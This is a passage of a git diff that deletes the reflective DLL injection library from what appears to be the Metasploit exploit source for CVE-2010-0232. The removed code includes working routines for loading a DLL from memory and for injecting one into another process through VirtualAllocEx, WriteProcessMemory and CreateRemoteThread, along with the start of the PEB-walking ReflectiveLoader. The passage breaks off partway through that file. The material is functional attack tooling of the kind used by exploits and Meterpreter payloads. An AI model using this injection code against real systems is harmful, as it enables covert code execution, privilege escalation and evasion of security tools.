-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#include "GetProcAddressR.h"
-//===============================================================================================//
-// We implement a minimal GetProcAddress to avoid using the native kernel32!GetProcAddress which
-// wont be able to resolve exported addresses in reflectivly loaded librarys.
-FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName )
-{
-	UINT_PTR uiLibraryAddress = 0;
-	FARPROC fpResult          = NULL;
-
-	if( hModule == NULL )
-		return NULL;
-
-	// a module handle is really its base address
-	uiLibraryAddress = (UINT_PTR)hModule;
-
-	__try
-	{
-		UINT_PTR uiAddressArray = 0;
-		UINT_PTR uiNameArray    = 0;
-		UINT_PTR uiNameOrdinals = 0;
-		PIMAGE_NT_HEADERS pNtHeaders             = NULL;
-		PIMAGE_DATA_DIRECTORY pDataDirectory     = NULL;
-		PIMAGE_EXPORT_DIRECTORY pExportDirectory = NULL;
-			
-		// get the VA of the modules NT Header
-		pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew);
-
-		pDataDirectory = (PIMAGE_DATA_DIRECTORY)&pNtHeaders->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
-		// get the VA of the export directory
-		pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)( uiLibraryAddress + pDataDirectory->VirtualAddress );
-			
-		// get the VA for the array of addresses
-		uiAddressArray = ( uiLibraryAddress + pExportDirectory->AddressOfFunctions );
-
-		// get the VA for the array of name pointers
-		uiNameArray = ( uiLibraryAddress + pExportDirectory->AddressOfNames );
-				
-		// get the VA for the array of name ordinals
-		uiNameOrdinals = ( uiLibraryAddress + pExportDirectory->AddressOfNameOrdinals );
-
-		// test if we are importing by name or by ordinal...
-		if( ((DWORD)lpProcName & 0xFFFF0000 ) == 0x00000000 )
-		{
-			// import by ordinal...
-
-			// use the import ordinal (- export ordinal base) as an index into the array of addresses
-			uiAddressArray += ( ( IMAGE_ORDINAL( (DWORD)lpProcName ) - pExportDirectory->Base ) * sizeof(DWORD) );
-
-			// resolve the address for this imported function
-			fpResult = (FARPROC)( uiLibraryAddress + DEREF_32(uiAddressArray) );
-		}
-		else
-		{
-			// import by name...
-			DWORD dwCounter = pExportDirectory->NumberOfNames;
-			while( dwCounter-- )
-			{
-				char * cpExportedFunctionName = (char *)(uiLibraryAddress + DEREF_32( uiNameArray ));
-				
-				// test if we have a match...
-				if( strcmp( cpExportedFunctionName, lpProcName ) == 0 )
-				{
-					// use the functions name ordinal as an index into the array of name pointers
-					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-					
-					// calculate the virtual address for the function
-					fpResult = (FARPROC)(uiLibraryAddress + DEREF_32( uiAddressArray ));
-					
-					// finish...
-					break;
-				}
-						
-				// get the next exported function name
-				uiNameArray += sizeof(DWORD);
-
-				// get the next exported function name ordinal
-				uiNameOrdinals += sizeof(WORD);
-			}
-		}
-	}
-	__except( EXCEPTION_EXECUTE_HANDLER )
-	{
-		fpResult = NULL;
-	}
-
-	return fpResult;
-}
-//===============================================================================================//
diff --git a/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.h b/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.h
deleted file mode 100644
index 6f4729dd5d..0000000000
--- a/external/source/exploits/CVE-2010-0232/common/GetProcAddressR.h
+++ /dev/null
@@ -1,36 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
-#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
-//===============================================================================================//
-#include "ReflectiveDLLInjection.h"
-
-FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName );
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.c b/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.c
deleted file mode 100644
index 88d5be96b9..0000000000
--- a/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.c
+++ /dev/null
@@ -1,233 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#include "LoadLibraryR.h"
-//===============================================================================================//
-DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
-{    
-	WORD wIndex                          = 0;
-	PIMAGE_SECTION_HEADER pSectionHeader = NULL;
-	PIMAGE_NT_HEADERS pNtHeaders         = NULL;
-	
-	pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
-
-	pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
-
-    if( dwRva < pSectionHeader[0].PointerToRawData )
-        return dwRva;
-
-    for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
-    {   
-        if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )           
-           return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
-    }
-    
-    return 0;
-}
-//===============================================================================================//
-DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
-{
-	UINT_PTR uiBaseAddress   = 0;
-	UINT_PTR uiExportDir     = 0;
-	UINT_PTR uiNameArray     = 0;
-	UINT_PTR uiAddressArray  = 0;
-	UINT_PTR uiNameOrdinals  = 0;
-	DWORD dwCounter          = 0;
-#ifdef _WIN64
-	DWORD dwMeterpreterArch = 2;
-#else
-	// This will catch Win32 and WinRT.
-	DWORD dwMeterpreterArch = 1;
-#endif
-
-	uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
-
-	// get the File Offset of the modules NT Header
-	uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
-
-	// currenlty we can only process a PE file which is the same type as the one this fuction has  
-	// been compiled as, due to various offset in the PE structures being defined at compile time.
-	if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
-	{
-		if( dwMeterpreterArch != 1 )
-			return 0;
-	}
-	else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
-	{
-		if( dwMeterpreterArch != 2 )
-			return 0;
-	}
-	else
-	{
-		return 0;
-	}
-
-	// uiNameArray = the address of the modules export directory entry
-	uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
-	// get the File Offset of the export directory
-	uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );
-
-	// get the File Offset for the array of name pointers
-	uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );
-
-	// get the File Offset for the array of addresses
-	uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
-
-	// get the File Offset for the array of name ordinals
-	uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );	
-
-	// get a counter for the number of exported functions...
-	dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;
-
-	// loop through all the exported functions to find the ReflectiveLoader
-	while( dwCounter-- )
-	{
-		char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
-
-		if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
-		{
-			// get the File Offset for the array of addresses
-			uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );	
-	
-			// use the functions name ordinal as an index into the array of name pointers
-			uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
-
-			// return the File Offset to the ReflectiveLoader() functions code...
-			return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
-		}
-		// get the next exported function name
-		uiNameArray += sizeof(DWORD);
-
-		// get the next exported function name ordinal
-		uiNameOrdinals += sizeof(WORD);
-	}
-
-	return 0;
-}
-//===============================================================================================//
-// Loads a DLL image from memory via its exported ReflectiveLoader function
-HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength )
-{
-	HMODULE hResult                    = NULL;
-	DWORD dwReflectiveLoaderOffset     = 0;
-	DWORD dwOldProtect1                = 0;
-	DWORD dwOldProtect2                = 0;
-	REFLECTIVELOADER pReflectiveLoader = NULL;
-	DLLMAIN pDllMain                   = NULL;
-
-	if( lpBuffer == NULL || dwLength == 0 )
-		return NULL;
-
-	__try
-	{
-		// check if the library has a ReflectiveLoader...
-		dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
-		if( dwReflectiveLoaderOffset != 0 )
-		{
-			pReflectiveLoader = (REFLECTIVELOADER)((UINT_PTR)lpBuffer + dwReflectiveLoaderOffset);
-
-			// we must VirtualProtect the buffer to RWX so we can execute the ReflectiveLoader...
-			// this assumes lpBuffer is the base address of the region of pages and dwLength the size of the region
-			if( VirtualProtect( lpBuffer, dwLength, PAGE_EXECUTE_READWRITE, &dwOldProtect1 ) )
-			{
-				// call the librarys ReflectiveLoader...
-				pDllMain = (DLLMAIN)pReflectiveLoader();
-				if( pDllMain != NULL )
-				{
-					// call the loaded librarys DllMain to get its HMODULE
-					// Dont call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH as that is for payloads only.
-					if( !pDllMain( NULL, DLL_QUERY_HMODULE, &hResult ) )	
-						hResult = NULL;
-				}
-				// revert to the previous protection flags...
-				VirtualProtect( lpBuffer, dwLength, dwOldProtect1, &dwOldProtect2 );
-			}
-		}
-	}
-	__except( EXCEPTION_EXECUTE_HANDLER )
-	{
-		hResult = NULL;
-	}
-
-	return hResult;
-}
-//===============================================================================================//
-// Loads a PE image from memory into the address space of a host process via the image's exported ReflectiveLoader function
-// Note: You must compile whatever you are injecting with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR 
-//       defined in order to use the correct RDI prototypes.
-// Note: The hProcess handle must have these access rights: PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | 
-//       PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ
-// Note: If you are passing in an lpParameter value, if it is a pointer, remember it is for a different address space.
-// Note: This function currently cant inject accross architectures, but only to architectures which are the 
-//       same as the arch this function is compiled as, e.g. x86->x86 and x64->x64 but not x64->x86 or x86->x64.
-HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter )
-{
-	LPVOID lpRemoteLibraryBuffer              = NULL;
-	LPTHREAD_START_ROUTINE lpReflectiveLoader = NULL;
-	HANDLE hThread                            = NULL;
-	DWORD dwReflectiveLoaderOffset            = 0;
-	DWORD dwThreadId                          = 0;
-
-	__try
-	{
-		do
-		{
-			if( !hProcess  || !lpBuffer || !dwLength )
-				break;
-
-			// check if the library has a ReflectiveLoader...
-			dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
-			if( !dwReflectiveLoaderOffset )
-				break;
-
-			// alloc memory (RWX) in the host process for the image...
-			lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); 
-			if( !lpRemoteLibraryBuffer )
-				break;
-
-			// write the image into the host process...
-			if( !WriteProcessMemory( hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL ) )
-				break;
-
-			// add the offset to ReflectiveLoader() to the remote library address...
-			lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset );
-
-			// create a remote thread in the host process to call the ReflectiveLoader!
-			hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId );
-
-		} while( 0 );
-
-	}
-	__except( EXCEPTION_EXECUTE_HANDLER )
-	{
-		hThread = NULL;
-	}
-
-	return hThread;
-}
-//===============================================================================================//
diff --git a/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.h b/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.h
deleted file mode 100644
index ad57808084..0000000000
--- a/external/source/exploits/CVE-2010-0232/common/LoadLibraryR.h
+++ /dev/null
@@ -1,41 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
-#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
-//===============================================================================================//
-#include "ReflectiveDLLInjection.h"
-
-DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer );
-
-HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength );
-
-HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter );
-
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/CVE-2010-0232/common/ReflectiveDLLInjection.h b/external/source/exploits/CVE-2010-0232/common/ReflectiveDLLInjection.h
deleted file mode 100644
index 23d607ee00..0000000000
--- a/external/source/exploits/CVE-2010-0232/common/ReflectiveDLLInjection.h
+++ /dev/null
@@ -1,53 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
-#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
-//===============================================================================================//
-#define WIN32_LEAN_AND_MEAN
-#include <windows.h>
-
-// we declare some common stuff in here...
-
-#define DLL_METASPLOIT_ATTACH	4
-#define DLL_METASPLOIT_DETACH	5
-#define DLL_QUERY_HMODULE		6
-
-#define DEREF( name )*(UINT_PTR *)(name)
-#define DEREF_64( name )*(DWORD64 *)(name)
-#define DEREF_32( name )*(DWORD *)(name)
-#define DEREF_16( name )*(WORD *)(name)
-#define DEREF_8( name )*(BYTE *)(name)
-
-typedef UINT_PTR (WINAPI * REFLECTIVELOADER)( VOID );
-typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
-
-#define DLLEXPORT   __declspec( dllexport ) 
-
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.c b/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.c
deleted file mode 100644
index a302e3903d..0000000000
--- a/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.c
+++ /dev/null
@@ -1,599 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-// 
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
-// provided that the following conditions are met:
-// 
-//     * Redistributions of source code must retain the above copyright notice, this list of 
-// conditions and the following disclaimer.
-// 
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
-// conditions and the following disclaimer in the documentation and/or other materials provided 
-// with the distribution.
-// 
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-// 
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#include "ReflectiveLoader.h"
-//===============================================================================================//
-// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
-HINSTANCE hAppInstance = NULL;
-//===============================================================================================//
-#pragma intrinsic( _ReturnAddress )
-// This function can not be inlined by the compiler or we will not get the address we expect. Ideally 
-// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of 
-// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics 
-// available (and no inline asm available under x64).
-__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)_ReturnAddress(); }
-//===============================================================================================//
-
-#ifdef ENABLE_OUTPUTDEBUGSTRING
-#define OUTPUTDBG(str) pOutputDebug((LPCSTR)str)
-#else /* ENABLE_OUTPUTDEBUGSTRING */
-#define OUTPUTDBG(str) do{}while(0)
-#endif
-
-// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,  
-//         otherwise the DllMain at the end of this file will be used.
-
-// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
-//         otherwise it is assumed you are calling the ReflectiveLoader via a stub.
-
-// This is our position independent reflective DLL loader/injector
-#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
-DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
-#else
-DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID )
-#endif
-{
-	// the functions we need
-	LOADLIBRARYA pLoadLibraryA     = NULL;
-	GETPROCADDRESS pGetProcAddress = NULL;
-	VIRTUALALLOC pVirtualAlloc     = NULL;
-	NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
-#ifdef ENABLE_STOPPAGING
-	VIRTUALLOCK pVirtualLock	   = NULL;
-#endif
-#ifdef ENABLE_OUTPUTDEBUGSTRING
-	OUTPUTDEBUG pOutputDebug       = NULL;
-#endif
-
-	USHORT usCounter;
-
-	// the initial location of this image in memory
-	ULONG_PTR uiLibraryAddress;
-	// the kernels base address and later this images newly loaded base address
-	ULONG_PTR uiBaseAddress;
-
-	// variables for processing the kernels export table
-	ULONG_PTR uiAddressArray;
-	ULONG_PTR uiNameArray;
-	ULONG_PTR uiExportDir;
-	ULONG_PTR uiNameOrdinals;
-	DWORD dwHashValue;
-
-	// variables for loading this image
-	ULONG_PTR uiHeaderValue;
-	ULONG_PTR uiValueA;
-	ULONG_PTR uiValueB;
-	ULONG_PTR uiValueC;
-	ULONG_PTR uiValueD;
-	ULONG_PTR uiValueE;
-
-	// STEP 0: calculate our images current base address
-
-	// we will start searching backwards from our callers return address.
-	uiLibraryAddress = caller();
-
-	// loop through memory backwards searching for our images base address
-	// we dont need SEH style search as we shouldnt generate any access violations with this
-	while( TRUE )
-	{
-		if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
-		{
-			uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
-			// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
-			// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
-			if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
-			{
-				uiHeaderValue += uiLibraryAddress;
-				// break if we have found a valid MZ/PE header
-				if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
-					break;
-			}
-		}
-		uiLibraryAddress--;
-	}
-
-	// STEP 1: process the kernels exports for the functions our loader needs...
-
-	// get the Process Enviroment Block
-#ifdef _WIN64
-	uiBaseAddress = __readgsqword( 0x60 );
-#else
-#ifdef WIN_ARM
-	uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 );
-#else _WIN32
-	uiBaseAddress = __readfsdword( 0x30 );
-#endif
-#endif
-
-	// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
-	uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
-
-	// get the first entry of the InMemoryOrder module list
-	uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
-	while( uiValueA )
-	{
-		// get pointer to current modules name (unicode string)
-		uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
-		// set bCounter to the length for the loop
-		usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
-		// clear uiValueC which will store the hash of the module name
-		uiValueC = 0;
-
-		// compute the hash of the module name...
-		do
-		{
-			uiValueC = ror( (DWORD)uiValueC );
-			// normalize to uppercase if the module name is in lowercase
-			if( *((BYTE *)uiValueB) >= 'a' )
-				uiValueC += *((BYTE *)uiValueB) - 0x20;
-			else
-				uiValueC += *((BYTE *)uiValueB);
-			uiValueB++;
-		} while( --usCounter );
-
-		// compare the hash with that of kernel32.dll
-		if( (DWORD)uiValueC == KERNEL32DLL_HASH )
-		{
-			// get this modules base address
-			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
-
